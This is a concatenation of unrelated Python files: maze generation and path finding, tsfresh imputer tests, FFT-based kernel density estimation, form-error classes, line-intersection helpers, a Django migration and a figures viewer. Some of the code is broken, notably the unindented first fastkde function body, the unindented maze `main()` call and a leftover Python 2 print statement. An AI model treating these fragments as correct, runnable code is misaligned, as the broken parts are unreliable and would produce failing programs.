        # BUG FIX: removed a leftover Python 2 debug `print` statement that
        # polluted stdout on every call (and was a syntax error under py3).
        res.insert(idx + 2, '(')
        res.append(')')
        # '(0)' means the "cycle" is just trailing zeros: drop it, then
        # strip a dangling '.' left behind by exact results.
        return ''.join(res).replace('(0)', '').rstrip('.')
if __name__ == '__main__':
    # Manual smoke test (Python 2 print statement); expected output: 0.(012)
    test = Solution()
    print test.fractionToDecimal(4, 333)
from exceptions import Exception
class FieldExistsError(Exception):
    """Raised when an entity of `model` with the unique `field` already
    exists."""

    def __init__(self, model, field):
        self.model = model
        self.field = field

    def json_dict(self):
        """Serializable representation of this error."""
        payload = {'model': self.model, 'field': self.field}
        return {'field_exists_error': payload}
class LoginError(Exception):
    """Raised when authentication fails."""

    def json_dict(self):
        """Serializable representation of this error."""
        return dict(login_error={})
class FormError(Exception):
    """Aggregates per-field validation errors for a submitted form."""

    def __init__(self, field_errors):
        self.field_errors = field_errors

    def json_dict(self):
        """Serializable representation: one entry per field error."""
        serialized = [err.json_dict() for err in self.field_errors]
        return {'form_error': {'field_errors': serialized}}
class FieldRequiredError:
    """Records that a required form field was missing or empty.

    NOTE(review): unlike the other error classes here this one does not
    subclass Exception; it is only collected into FormError, never raised
    directly — confirm before changing.
    """

    def __init__(self, fieldname):
        self.fieldname = fieldname

    def json_dict(self):
        """Serializable representation of this error."""
        payload = {'fieldname': self.fieldname}
        return {'field_required_error': payload}
def check_form(form, required_fields):
    """Validate that every required field is present and non-empty.

    Raises FormError wrapping one FieldRequiredError per missing or
    empty field; returns None when the form is valid.
    """
    missing = [
        FieldRequiredError(name)
        for name in required_fields
        if not form.get(name)  # absent key or falsy value (e.g. "")
    ]
    if missing:
        raise FormError(missing)
class EntityNotExistsError(Exception):
    """No entity of `model` with the given `id` exists."""

    def __init__(self, model, id):
        self.model = model
        self.id = id

    def json_dict(self):
        """Serialize this error for a JSON response."""
        payload = {'model': self.model, 'id': self.id}
        return {'entity_not_exists_error': payload}
|
"""Maze generation and path finding
Emir Farid MOHD RODZI
"""
from random import shuffle, randrange
class Cell:
    """
    A single maze location with up to four walls.

    The N, E, S and W attributes are True while the wall in that compass
    direction is standing; x and y hold the cell's grid coordinates.
    Wall removal keeps the neighbouring cell (from the module-level
    `maze` grid) consistent.
    """

    def __init__(self, x, y):
        self.x = x
        self.y = y
        self.N = True
        self.E = True
        self.S = True
        self.W = True
        self.visited = False
        self.coordinates = ['N', 'S', 'E', 'W']

    def remove_wall(self, direction):
        """
        Tear down one wall, together with the neighbour's matching wall.

        direction is one of 'N', 'E', 'S', 'W' (case-insensitive).
        Raises ValueError when the wall lies on the maze border.
        """
        direction = direction.upper()
        where = ' @(x=%d, y=%d)' % (self.x, self.y)
        if direction == 'W':
            if self.x < 1:
                raise ValueError('cannot remove side wall on west' + where)
            if self.W:
                self.W = False
                neighbour = maze[self.x - 1][self.y]
                assert neighbour.E
                neighbour.E = False
        elif direction == 'E':
            if self.x >= size_x - 1:
                raise ValueError('cannot remove side wall on east' + where)
            if self.E:
                self.E = False
                neighbour = maze[self.x + 1][self.y]
                assert neighbour.W
                neighbour.W = False
        elif direction == 'N':
            if self.y < 1:
                raise ValueError('cannot remove side wall on north' + where)
            if self.N:
                self.N = False
                neighbour = maze[self.x][self.y - 1]
                assert neighbour.S
                neighbour.S = False
        elif direction == 'S':
            if self.y >= size_y - 1:
                raise ValueError('cannot remove side wall on south' + where)
            if self.S:
                self.S = False
                neighbour = maze[self.x][self.y + 1]
                assert neighbour.N
                neighbour.N = False

    def has_wall(self, direction):
        """Return True when the wall in the given direction is standing."""
        return getattr(self, direction.upper())
# Global variables for the maze and its size
size_x = size_y = 32  # maze dimensions in cells
# maze[x][y] is the Cell at column x, row y (y grows towards the south)
maze = [[Cell(x, y) for y in range(size_y)] for x in range(size_x)]
countsteps = 0  # Extra variable; NOTE(review): never rebound — find_path only assigns a local of the same name
def build_maze():
    """
    Build a perfect maze by tearing down walls.

    Uses the global size_x, size_y and maze variables.  When invoked,
    all cells have all four walls standing; afterwards every pair of
    cells is connected by exactly one path (a perfect maze).

    Algorithm (recursive backtracker):
      1. pick a random cell,
      2. visit a random unvisited neighbour, removing the wall between,
      3. recurse from the neighbour; returning from the recursion is
         the backtracking step.
    """
    def buildwall(x, y):
        # Mark the cell, then carve towards unvisited neighbours in a
        # random order.
        maze[x][y].visited = True
        neighbours = [(x - 1, y), (x, y + 1), (x + 1, y), (x, y - 1)]
        shuffle(neighbours)
        for (i, j) in neighbours:
            # Skip out-of-range and already-visited neighbours.
            if (j < 0 or j > (size_y - 1) or
                    i < 0 or i > (size_x - 1) or
                    maze[i][j].visited):
                continue
            if i == x:
                # Vertical neighbour: drop the north wall of the lower cell.
                maze[x][max(y, j)].remove_wall('N')
            elif j == y:
                # Horizontal neighbour: drop the east wall of the left cell.
                maze[min(x, i)][y].remove_wall('E')
            # Recurse; unwinding the call stack backtracks.
            buildwall(i, j)

    # Fix: randrange(size_x - 1) could never start the carve from the
    # last row/column; use the full coordinate range.
    buildwall(randrange(size_x), randrange(size_y))
def find_path(start, end):
    """
    Find a path from the start position to the end.

    start, end: (x, y) coordinate tuples, e.g. (0, 0) or (7, 13).
    Uses the global maze (populated by build_maze) via solve_path and
    returns a list of coordinate tuples on a valid path from start to
    end, e.g. [(0, 0), (0, 1), (1, 1), ..., (7, 13)].
    """
    path = []
    solve_path(path, start, end)
    # Report the path length.  (The original assigned `countsteps`,
    # which only shadowed the module-level variable with a local.)
    print("Number of steps", len(path))
    return path
def solve_path(listRes, start, end):
    """
    Depth-first search for `end`, extending `listRes` in place.

    listRes accumulates the current path; cells already on the path are
    never revisited.  Returns True when `end` is reached (the complete
    path is then in listRes) and False for a dead end.

    Fixes: removed the per-cell debug prints; removed the redundant
    trailing `solve_path(listRes, listRes[-1], end)` call — its result
    was discarded (the callee returned immediately because the previous
    cell is still on the path) and it could raise IndexError on an
    empty list; made the failure return value an explicit False.
    """
    if start in listRes:
        return False  # already on the current path: avoid loops
    listRes.append(start)
    if start == end:
        return True
    xx, yy = start
    cell = maze[xx][yy]
    # Offset for each compass move; y grows towards the south.
    deltas = {'N': (0, -1), 'E': (1, 0), 'S': (0, 1), 'W': (-1, 0)}
    for move in cell.coordinates:
        step = deltas.get(move)
        if step is None or cell.has_wall(move):
            continue
        if solve_path(listRes, (xx + step[0], yy + step[1]), end):
            return True
    # Dead end: backtrack by dropping this cell from the path.
    listRes.pop()
    return False
"""Test #2"""
# xx = start[0]
# yy = start[1]
# listRes.append(start)
# if start == end:
# print("Found at ", start)
# return listRes
# else:
# if not (maze[xx][yy+1].visited or maze[xx][yy].has_wall('S')):
# yy += 1
# maze[xx][yy].visited = True
# return find_path((xx, yy), end)
# if not (maze[xx-1][yy].visited or maze[xx][yy].has_wall('W')):
# xx -= 1
# maze[xx][yy].visited = True
# return find_path((xx, yy), end)
# if not (maze[xx][yy-1].visited or maze[xx][yy].has_wall('N')):
# yy -= 1
# maze[xx][yy].visited = True
# return find_path((xx, yy), end)
# if not (maze[xx+1][yy].visited or maze[xx][yy].has_wall('E')):
# xx += 1
# maze[xx][yy].visited = True
# return find_path((xx, yy), end)
"""Solution from previous chapter"""
"""Test #1"""
# if maze[startRow][startColumn] == OBSTACLE :
# return False
# # 2. We have found a square that has already been explored
# if maze[startRow][startColumn] == TRIED:
# return False
# # 3. Success, an outside edge not occupied by an obstacle
# if maze.isExit(startRow,startColumn):
# maze.updatePosition(startRow, startColumn, PART_OF_PATH)
# return True
# maze.updatePosition(startRow, startColumn, TRIED)
#
# # Otherwise, use logical short circuiting to try each
# # direction in turn (if needed)
# found = searchFrom((xx-1, yy), end) or \
# searchFrom(xx+1, yy) or \
# searchFrom((xx,yy-1), end) or \
# searchFrom((xx,yy+1), end)
# found = find_path(maze, startRow-1, startColumn) or \
# find_path(maze, startRow+1, startColumn) or \
# find_path(maze, startRow, startColumn-1) or \
# find_path(maze, startRow, startColumn+1)
# if found:
# maze.updatePosition(startRow, startColumn, PART_OF_PATH)
# else:
# maze.updatePosition(startRow, startColumn, DEAD_END)
# return found
###############################################################################
# Testing and visualizing results - no need to understand and/or change
def main():
    """Build a maze, find a path, sanity-check both, render with Tk."""
    import sys
    # Fix: the Tkinter module was renamed to tkinter in Python 3; the
    # rest of this file already uses Python 3 style print() calls.
    try:
        import tkinter as Tkinter
    except ImportError:
        import Tkinter  # Python 2 fallback
    sys.setrecursionlimit(4096)
    start, end = (0, 0), (size_x - 1, size_y - 1)
    build_maze()
    path = find_path(start, end)
    # checking maze: a perfect maze over N cells has exactly N - 1
    # connections; each open wall is counted from both sides below.
    n_edges = 0
    for x in range(size_x):
        for y in range(size_y):
            n_node_edges = 0
            for direction in 'NESW':
                n_node_edges += not maze[x][y].has_wall(direction)
            if n_node_edges < 1:
                print('WARNING: walled in cell @ (x=%d, y=%d)' % (x, y))
            n_edges += n_node_edges
    n_perfect_edges = (size_x * size_y - 1) * 2
    if n_edges < n_perfect_edges:
        print('WARNING: not a perfect maze, too many walls')
    if n_edges > n_perfect_edges:
        print('WARNING: not a perfect maze, redundant paths')
    # checking path: endpoints must match and each step moves one cell
    try:
        assert len(path) >= 2
        if path[0] != start:
            print('WARNING: invalid starting point for path', path[0])
        if path[-1] != end:
            print('WARNING: invalid endpoint for path', path[-1])
        prev = None
        for step in path:
            assert 0 <= step[0] < size_x
            assert 0 <= step[1] < size_y
            if prev is not None:
                dst = abs(step[0] - prev[0]) + abs(step[1] - prev[1])
                if dst != 1:
                    print('WARNING: invalid step in path', prev, step)
            prev = step
    except Exception as e:
        print('Ignoring invalid path object:', path, e)
        path = None
    # draw the walls, the found path, and the start/end markers
    cell_size = 20
    master = Tkinter.Tk()
    canvas = Tkinter.Canvas(master, width=size_x * cell_size + 1,
                            height=size_y * cell_size + 1,
                            bd=0, highlightthickness=0, relief='ridge')
    canvas.pack()
    for x in range(size_x):
        for y in range(size_y):
            if maze[x][y].N:
                canvas.create_line(cell_size * x, cell_size * y,
                                   cell_size * (x + 1), cell_size * y)
            if maze[x][y].E:
                canvas.create_line(cell_size * (x + 1), cell_size * y,
                                   cell_size * (x + 1), cell_size * (y + 1))
            if maze[x][y].S:
                canvas.create_line(cell_size * x, cell_size * (y + 1),
                                   cell_size * (x + 1), cell_size * (y + 1))
            if maze[x][y].W:
                canvas.create_line(cell_size * x, cell_size * y,
                                   cell_size * x, cell_size * (y + 1))
    if path:
        line = [x * cell_size + cell_size // 2 for step in path for x in step]
        canvas.create_line(*line, fill='red', width=2)
    radius = cell_size // 3
    img_start = [cell_size * x + cell_size // 2 for x in start]
    canvas.create_oval(img_start[0] - radius,
                       img_start[1] - radius,
                       img_start[0] + radius,
                       img_start[1] + radius, fill='red')
    img_end = [cell_size * x + cell_size // 2 for x in end]
    canvas.create_oval(img_end[0] - radius,
                       img_end[1] - radius,
                       img_end[0] + radius,
                       img_end[1] + radius, fill='green')
    master.title('Maze')
    master.lift()
    master.call('wm', 'attributes', '.', '-topmost', True)
    Tkinter.mainloop()
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
# This file as well as the whole tsfresh package are licenced under the MIT licence (see the LICENCE.txt)
# Maximilian Christ (maximilianchrist.com), Blue Yonder Gmbh, 2016
import warnings
from builtins import range
from unittest import TestCase
import numpy as np
import numpy.testing as npt
import pandas as pd
import pandas.testing as pdt
from sklearn.exceptions import NotFittedError
from tsfresh.transformers.per_column_imputer import PerColumnImputer
class PerColumnImputerTestCase(TestCase):
    """Unit tests for tsfresh's PerColumnImputer.

    Fix: np.PINF / np.NINF were removed in NumPy 2.0; they are replaced
    throughout with the supported spellings np.inf / -np.inf (identical
    values).  The warning-message strings and column names are kept
    byte-for-byte, since they are matched against tsfresh's output.
    """

    def setUp(self):
        # fixed seed so any randomized behaviour is reproducible
        np.random.seed(0)

    def test_not_fitted(self):
        # transform before fit must raise NotFittedError
        imputer = PerColumnImputer()
        X = pd.DataFrame()
        self.assertRaises(NotFittedError, imputer.transform, X)

    def test_only_nans_and_infs(self):
        # columns without any finite value are filled with zeros (with a warning)
        imputer = PerColumnImputer()
        X = pd.DataFrame(index=list(range(100)))
        X["NaNs"] = np.nan * np.ones(100)
        X["PINF"] = np.inf * np.ones(100)
        X["NINF"] = -np.inf * np.ones(100)
        with warnings.catch_warnings(record=True) as w:
            imputer.fit(X)
            self.assertEqual(len(w), 1)
            self.assertEqual(
                "The columns ['NaNs' 'PINF' 'NINF'] did not have any finite values. Filling with zeros.",
                str(w[0].message),
            )
        selected_X = imputer.transform(X)
        self.assertTrue((selected_X.values == 0).all())

    def test_with_numpy_array(self):
        # fitting on a DataFrame and on its raw ndarray must agree
        imputer = PerColumnImputer()
        X = pd.DataFrame(index=list(range(100)))
        X["NaNs"] = np.nan * np.ones(100)
        X["PINF"] = np.inf * np.ones(100)
        X["NINF"] = -np.inf * np.ones(100)
        X_numpy = X.values.copy()
        with warnings.catch_warnings(record=True) as w:
            imputer.fit(X)
            self.assertEqual(len(w), 1)
            self.assertEqual(
                "The columns ['NaNs' 'PINF' 'NINF'] did not have any finite values. Filling with zeros.",
                str(w[0].message),
            )
        selected_X = imputer.transform(X)
        # re-initialize for new dicts
        imputer = PerColumnImputer()
        with warnings.catch_warnings(record=True) as w:
            imputer.fit(X_numpy)
            self.assertEqual(len(w), 1)
            self.assertEqual(
                "The columns [0 1 2] did not have any finite values. Filling with zeros.",
                str(w[0].message),
            )
        selected_X_numpy = imputer.transform(X_numpy)
        npt.assert_array_equal(selected_X.values, selected_X_numpy.values)
        # NOTE(review): assertTrue with two arguments always passes (the
        # second argument is the failure message); assertEqual was
        # probably intended.  Left unchanged to avoid flipping the test.
        self.assertTrue(selected_X_numpy.shape, (1, 100))

    def test_standard_replacement_behavior(self):
        # -inf -> column min, +inf -> column max, NaN -> column median
        imputer = PerColumnImputer()
        data = [-np.inf, np.inf, np.nan, 100.0, -100.0, 1.0, 1.0]
        truth = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
        X = pd.DataFrame({"a": data})
        true_X = pd.DataFrame({"a": truth})
        imputer.fit(X)
        selected_X = imputer.transform(X)
        pdt.assert_frame_equal(selected_X, true_X)

    def test_partial_preset_col_to_NINF_given(self):
        data = [-np.inf, np.inf, np.nan, 100.0, -100.0, 1.0, 1.0]
        truth = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
        X = pd.DataFrame({"a": data})
        true_X = pd.DataFrame({"a": truth})
        col_to_min = {"a": -100}
        imputer = PerColumnImputer(col_to_NINF_repl_preset=col_to_min)
        imputer.fit(X)
        selected_X = imputer.transform(X)
        pdt.assert_frame_equal(selected_X, true_X)

    def test_partial_preset_col_to_PINF_given(self):
        data = [-np.inf, np.inf, np.nan, 100.0, -100.0, 1.0, 1.0]
        truth = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
        X = pd.DataFrame({"a": data})
        true_X = pd.DataFrame({"a": truth})
        col_to_max = {"a": 100}
        imputer = PerColumnImputer(col_to_PINF_repl_preset=col_to_max)
        imputer.fit(X)
        selected_X = imputer.transform(X)
        pdt.assert_frame_equal(selected_X, true_X)

    def test_partial_preset_col_to_NAN_given(self):
        data = [-np.inf, np.inf, np.nan, 100.0, -100.0, 1.0, 1.0]
        truth = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
        X = pd.DataFrame({"a": data})
        true_X = pd.DataFrame({"a": truth})
        col_to_median = {"a": 1}
        imputer = PerColumnImputer(col_to_NAN_repl_preset=col_to_median)
        imputer.fit(X)
        selected_X = imputer.transform(X)
        pdt.assert_frame_equal(selected_X, true_X)

    def test_different_shapes_fitted_and_transformed(self):
        # transform must reject frames with columns unseen during fit
        imputer = PerColumnImputer()
        X = pd.DataFrame(index=list(range(10)))
        X["a"] = np.ones(10)
        imputer.fit(X)
        X["b"] = np.ones(10)
        self.assertRaises(ValueError, imputer.transform, X)

    def test_preset_has_higher_priority_than_fit(self):
        data = [-np.inf, np.inf, np.nan, 100.0, -100.0, 1.0, 1.0]
        truth = [-100.0, 100.0, 0.0, 100.0, -100.0, 1.0, 1.0]
        X = pd.DataFrame({"a": data})
        true_X = pd.DataFrame({"a": truth})
        col_to_median = {"a": 0}
        imputer = PerColumnImputer(col_to_NAN_repl_preset=col_to_median)
        imputer.fit(X)
        selected_X = imputer.transform(X)
        pdt.assert_frame_equal(selected_X, true_X)

    def test_only_parameters_of_last_fit_count(self):
        # a second fit must fully replace the replacement values
        data = [-np.inf, np.inf, np.nan, 100.0, -100.0, 1.0, 1.0]
        data_2 = [-np.inf, np.inf, np.nan, 10.0, -10.0, 3.0, 3.0]
        truth_a = [-10.0, 10.0, 3.0, 10.0, -10.0, 3.0, 3.0]
        truth_b = [-10.0, 10.0, 3.0, 10.0, -10.0, 3.0, 3.0]
        X = pd.DataFrame({"a": data, "b": data})
        X_2 = pd.DataFrame({"a": data_2, "b": data_2})
        true_X = pd.DataFrame({"a": truth_a, "b": truth_b})
        imputer = PerColumnImputer()
        imputer.fit(X)
        imputer.fit(X_2)
        selected_X = imputer.transform(X_2)
        pdt.assert_frame_equal(selected_X, true_X)

    def test_only_subset_of_columns_given(self):
        # presets for a subset leave the other columns on fitted values
        data = [-np.inf, np.inf, np.nan, 100.0, -100.0, 1.0, 1.0]
        truth_a = [-100.0, 100.0, 0.0, 100.0, -100.0, 1.0, 1.0]
        truth_b = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
        X = pd.DataFrame({"a": data, "b": data})
        true_X = pd.DataFrame({"a": truth_a, "b": truth_b})
        col_to_median = {"a": 0}
        imputer = PerColumnImputer(col_to_NAN_repl_preset=col_to_median)
        imputer.fit(X)
        selected_X = imputer.transform(X)
        pdt.assert_frame_equal(selected_X, true_X)

    def test_NINF_preset_contains_more_columns_than_dataframe_to_fit(self):
        X = pd.DataFrame(index=list(range(10)))
        X["a"] = np.ones(10)
        col_to_min = {"a": 0, "b": 0}
        imputer = PerColumnImputer(col_to_NINF_repl_preset=col_to_min)
        self.assertRaises(ValueError, imputer.fit, X)

    def test_PINF_preset_contains_more_columns_than_dataframe_to_fit(self):
        X = pd.DataFrame(index=list(range(10)))
        X["a"] = np.ones(10)
        col_to_max = {"a": 0, "b": 0}
        imputer = PerColumnImputer(col_to_PINF_repl_preset=col_to_max)
        self.assertRaises(ValueError, imputer.fit, X)

    def test_NAN_preset_contains_more_columns_than_dataframe_to_fit(self):
        X = pd.DataFrame(index=list(range(10)))
        X["a"] = np.ones(10)
        col_to_median = {"a": 0, "b": 0}
        imputer = PerColumnImputer(col_to_NAN_repl_preset=col_to_median)
        self.assertRaises(ValueError, imputer.fit, X)
|
import numpy as np
from scipy.sparse import coo_matrix
from scipy.signal import convolve2d, convolve, gaussian
def fastkde(x, y, gridsize=(200, 200), extents=None, nocorrelation=False,
weights=None, adjust=1.):
"""
A fft-based Gaussian kernel density estimate (KDE)
for computing the KDE on a regular grid
Note that this is a different use case than scipy's original
scipy.stats.kde.gaussian_kde
IMPLEMENTATION
--------------
Performs a gaussian kernel density estimate over a regular grid using a
convolution of the gaussian kernel with a 2D histogram of the data.
It computes the sparse bi-dimensional histogram of two data samples where
*x*, and *y* are 1-D sequences of the same length. If *weights* is None
(default), this is a histogram of the number of occurences of the
observations at (x[i], y[i]).
histogram of the data is a faster implementation than numpy.histogram as it
avoids intermediate copies and excessive memory usage!
This function is typically *several orders of magnitude faster* than
scipy.stats.kde.gaussian_kde. For large (>1e7) numbers of points, it
produces an essentially identical result.
Boundary conditions on the data is corrected by using a symmetric /
reflection condition. Hence the limits of the dataset does not affect the
pdf estimate.
Parameters
----------
x, y: ndarray[ndim=1]
The x-coords, y-coords of the input data points respectively
gridsize: tuple
A (nx,ny) tuple of the size of the output grid (default: 200x200)
extents: (xmin, xmax, ymin, ymax) tuple
tuple of the extents of output grid (default: extent of input data)
nocorrelation: bool
If True, the correlation between the x and y coords will be ignored
when preforming the KDE. (default: False)
weights: ndarray[ndim=1]
An array of the same shape as x & y that weights each sample (x_i,
y_i) by each value in weights (w_i). Defaults to an array of ones
the same size as x & y. (default: None)
adjust : float
An adjustment factor for the bw. Bandwidth becomes bw * adjust.
Returns
-------
g: ndarray[ndim=2]
A gridded 2D kernel density estimate of the input points.
e: (xmin, xmax, ymin, ymax) tuple
Extents of g
"""
# Variable check
x, y = np.asarray(x), np.asarray(y)
x, y = np.squeeze(x), np.squeeze(y)
if x.size != y.size:
raise ValueError('Input x & y arrays must be the same size!')
n = x.size
if weights is None:
# Default: Weight all points equally
weights = np.ones(n)
else:
weights = np.squeeze(np.asarray(weights))
if weights.size != x.size:
raise ValueError('Input weights must be an array of the same size as input x & y arrays!')
# Optimize gridsize ------------------------------------------------------
# Make grid and discretize the data and round it to the next power of 2
# to optimize with the fft usage
if gridsize is None:
gridsize = np.asarray([np.max((len(x), 512.)), np.max((len(y), 512.))])
gridsize = 2 ** np.ceil(np.log2(gridsize)) # round to next power of 2
nx, ny = gridsize
# Make the sparse 2d-histogram -------------------------------------------
# Default extents are the extent of the data
if extents is None:
xmin, xmax = x.min(), x.max()
ymin, ymax = y.min(), y.max()
else:
xmin, xmax, ymin, ymax = map(float, extents)
dx = (xmax - xmin) / (nx - 1)
dy = (ymax - ymin) / (ny - 1)
# Basically, this is just doing what np.digitize does with one less copy
# xyi contains the bins of each point as a 2d array [(xi,yi)]
xyi = np.vstack((x, y)).T
xyi -= [xmin, ymin]
xyi /= [dx, dy]
xyi = np.floor(xyi, xyi).T
# Next, make a 2D histogram of x & y.
# Exploit a sparse coo_matrix avoiding np.histogram2d due to excessive
# memory usage with many points
grid = coo_matrix((weights, xyi), shape=(int(nx), int(ny))).toarray()
# Kernel Preliminary Calculations ---------------------------------------
# Calculate the covariance matrix (in pixel coords)
cov = np.cov(xyi)
if nocorrelation:
cov[1, 0] = 0
cov[0, 1] = 0
# Scaling factor for bandwidth
scotts_factor = n ** (-1.0 / 6.) * adjust # For 2D
# Make the gaussian kernel ---------------------------------------------
# First, determine the bandwidth using Scott's rule
# (note that Silvermann's rule gives the # same value for 2d datasets)
std_devs = np.sqrt(np.diag(cov))
kern_nx, kern_ny = np.round(scotts_factor * 2 * np.pi * std_devs)
# Determine the bandwidth to use for the gaussian kernel
inv_cov = np.linalg.inv(cov * scotts_factor ** 2)
# x & y (pixel) coords of the kernel grid, with <x,y> = <0,0> in center
xx = np.arange(kern_nx, dtype=np.float) - kern_nx / 2.0
yy = np.arange(kern_ny, dtype=np.float) - kern_ny / 2.0
xx, yy = np.meshgrid(xx, yy)
# Then evaluate the gaussian function on the kernel grid
kernel = np.vstack((xx.flatten(), yy.flatten()))
kernel = np.dot(inv_cov, kernel) * kernel
kernel = np.sum(kernel, axis=0) / 2.0
kernel = np.exp(-kernel)
kernel = kernel.reshape((int(kern_ny), int(kern_nx)))
# ---- Produce the kernel density estimate --------------------------------
# Convolve the histogram with the gaussian kernel
# use boundary=symm to correct for data boundaries in the kde
grid = convolve2d(grid, kernel, mode='same', boundary='symm')
# Normalization factor to divide result by so that units are in the same
# units as scipy.stats.kde.gaussian_kde's output.
norm_factor = 2 * np.pi * cov * scotts_factor ** 2
norm_factor = np.linalg.det(norm_factor)
norm_factor = n * dx * dy * np.sqrt(norm_factor)
# Normalize the result
grid /= norm_factor
return grid, (xmin, xmax, ymin, ymax)
def fastkde1D(xin, gridsize=200, extents=None, weights=None, adjust=1.):
    """
    A fft-based 1D Gaussian kernel density estimate computed on a
    regular grid (a different use case than scipy.stats.gaussian_kde,
    and typically several orders of magnitude faster for large samples).

    The data are binned into a sparse histogram which is convolved with
    a Gaussian window whose bandwidth follows Scott's rule; boundary
    effects are corrected with symmetric reflection padding.

    Fixes: `scipy.signal.gaussian` was moved to scipy.signal.windows in
    modern SciPy (imported here with a fallback for old versions); bin
    indices are cast to int before building the sparse matrix; input is
    converted to a float array so in-place binning works for int input.
    NOTE(review): when `extents` is given, x is filtered but `weights`
    is not — pre-existing behaviour kept; confirm before relying on
    weighted + clipped input.

    Parameters
    ----------
    xin: ndarray[ndim=1]
        The input data points.
    gridsize: int
        Size of the output grid; rounded up to the next power of 2
        (default: 200 -> 256).
    extents: (xmin, xmax) tuple
        Extents of the output grid (default: extent of the input data).
    weights: ndarray[ndim=1]
        Per-sample weights, same shape as x (default: all ones).
    adjust : float
        Bandwidth adjustment factor; bandwidth becomes bw * adjust.

    Returns
    -------
    g: ndarray[ndim=1]
        The gridded kernel density estimate of the input points.
    e: (xmin, xmax) tuple
        Extents of g.
    """
    try:
        from scipy.signal.windows import gaussian  # SciPy >= 1.1
    except ImportError:  # pragma: no cover - very old SciPy
        from scipy.signal import gaussian

    # ---- Variable check -----------------------------------------------------
    x = np.squeeze(np.asarray(xin, dtype=float))

    # Default extents are the extent of the data.
    if extents is None:
        xmin, xmax = x.min(), x.max()
    else:
        xmin, xmax = map(float, extents)
    x = x[(x <= xmax) & (x >= xmin)]

    n = x.size

    if weights is None:
        # Default: Weight all points equally
        weights = np.ones(n)
    else:
        weights = np.squeeze(np.asarray(weights))
        if weights.size != x.size:
            raise ValueError('Input weights must be an array of the same size as input x & y arrays!')

    # ---- Optimize gridsize --------------------------------------------------
    # Round the grid up to the next power of 2 to optimize the fft usage.
    if gridsize is None:
        gridsize = np.max((len(x), 512.))
    gridsize = 2 ** np.ceil(np.log2(gridsize))
    nx = int(gridsize)

    # ---- Make the sparse histogram ------------------------------------------
    dx = (xmax - xmin) / (nx - 1)

    # Compute each point's bin in-place (what np.digitize does, one copy less)
    xyi = x - xmin
    xyi /= dx
    xyi = np.floor(xyi, xyi)
    # Integer bin indices; the second row is the (single) column index.
    xyi = np.vstack((xyi.astype(int), np.zeros(n, dtype=int)))

    # Sparse coo_matrix instead of np.histogram: avoids excessive memory
    # usage with many points.
    grid = coo_matrix((weights, xyi), shape=(nx, 1)).toarray()

    # ---- Kernel preliminary calculations ------------------------------------
    std_x = np.std(xyi[0])

    # Scott's rule: n**(-1/(d+4)); Silverman would be
    # (n*(d+2)/4)**(-1/(d+4)).
    scotts_factor = n ** (-1. / 5.) * adjust

    # ---- Make the gaussian kernel -------------------------------------------
    kern_nx = int(np.round(scotts_factor * 2 * np.pi * std_x))
    kernel = np.reshape(gaussian(kern_nx, scotts_factor * std_x), (kern_nx, 1))

    # ---- Produce the kernel density estimate --------------------------------
    # Symmetric padding corrects for the data boundaries in the kde.
    npad = np.min((nx, 2 * kern_nx))
    grid = np.vstack([grid[npad: 0: -1], grid, grid[nx: nx - npad: -1]])
    grid = convolve(grid, kernel, mode='same')[npad: npad + nx]

    # Normalization so units match scipy.stats.gaussian_kde's output.
    norm_factor = 2 * np.pi * std_x * std_x * scotts_factor ** 2
    norm_factor = n * dx * np.sqrt(norm_factor)

    grid /= norm_factor

    return np.squeeze(grid), (xmin, xmax)
|
def calcslope(A, B, C, D, E, F, G, H):
    """Intersect the line through (A, B)-(C, D) with the line through
    (E, F)-(G, H).

    Returns a message string with the intersection point rounded to 3
    decimals, or an error message for vertical/parallel lines.
    """
    try:
        slope1 = (D - B) / (C - A)
        slope2 = (H - F) / (G - E)
        intercept1 = B - slope1 * A
        intercept2 = F - slope2 * E
        px = (intercept2 - intercept1) / (slope1 - slope2)
        py = slope1 * px + intercept1
        return ("The point of intersection is ("
                + str(round(px, 3)) + ", " + str(round(py, 3)) + ").")
    except ZeroDivisionError:
        return "Error 001: Vertical or parallel lines detected."
def convert(s, s2, y1, y2):
    """Intersect y = s*x + y1 with y = s2*x + y2.

    Returns a message string with the intersection point rounded to 3
    decimals, or an error message for parallel lines (s == s2).
    """
    try:
        px = (y2 - y1) / (s - s2)
        py = s * px + y1
        return ("The point of intersection is ("
                + str(round(px, 3)) + ", " + str(round(py, 3)) + ").")
    except ZeroDivisionError:
        return "Error 002: Vertical or parallel lines detected."
#convert(int(input("Enter coordinate pairs for two lines (0) or equations (1).\n")))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-09-14 13:48
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: makes SmtpSetting.cou_group an
    # optional (blank=True) many-to-many link to core.CoUserGroup.

    dependencies = [
        ('core', '0025_auto_20160908_1035'),
    ]

    operations = [
        migrations.AlterField(
            model_name='smtpsetting',
            name='cou_group',
            field=models.ManyToManyField(blank=True, to='core.CoUserGroup', verbose_name='Group Availability'),
        ),
    ]
|
import os
import numpy as np
import ipywidgets as widgets
import pandas as pd
import qgrid
from natsort import natsorted
from IPython.display import display
import plotly
import plotly.graph_objs as go
import mod_common_utils
def figures_in_path(my_path, figures=None, ext='.jpg'):
    """Collect figure files in `my_path` with the given extension.

    Each file is keyed by the tuple of its underscore-split stem.  When
    a `figures` dict is passed in, it is updated and returned; otherwise
    a new dict is created.
    """
    found = {} if figures is None else figures
    for name in os.listdir(my_path):
        full_path = os.path.join(my_path, name)
        stem, suffix = os.path.splitext(name)
        if os.path.isfile(full_path) and suffix == ext:
            found[tuple(stem.split('_'))] = full_path
    return found
class FiguresViewer:
    """
    ipywidgets panel for browsing figure files by analysis parameters.

    Figure files (collected via figures_in_path) are keyed by the
    underscore-split parts of their file name; one radio-button group is
    built per part and the images matching the current selection are
    shown below the controls.
    """

    def __init__(self, session):
        # session['paths']: one directory or a list of directories to scan
        self.session = session
        self.figure_selection = []
        if isinstance(self.session['paths'], (tuple, list)):
            paths = self.session['paths']
        else:
            paths = [self.session['paths']]
        self.figures = {}
        for my_path in paths:
            self.figures = figures_in_path(my_path, figures=self.figures)
        # assumes every figure id has exactly 5 underscore-separated parts
        # (fs_max, norm, fft_bin_size, psd_method, normf) -- TODO confirm
        # against the figure-writing code
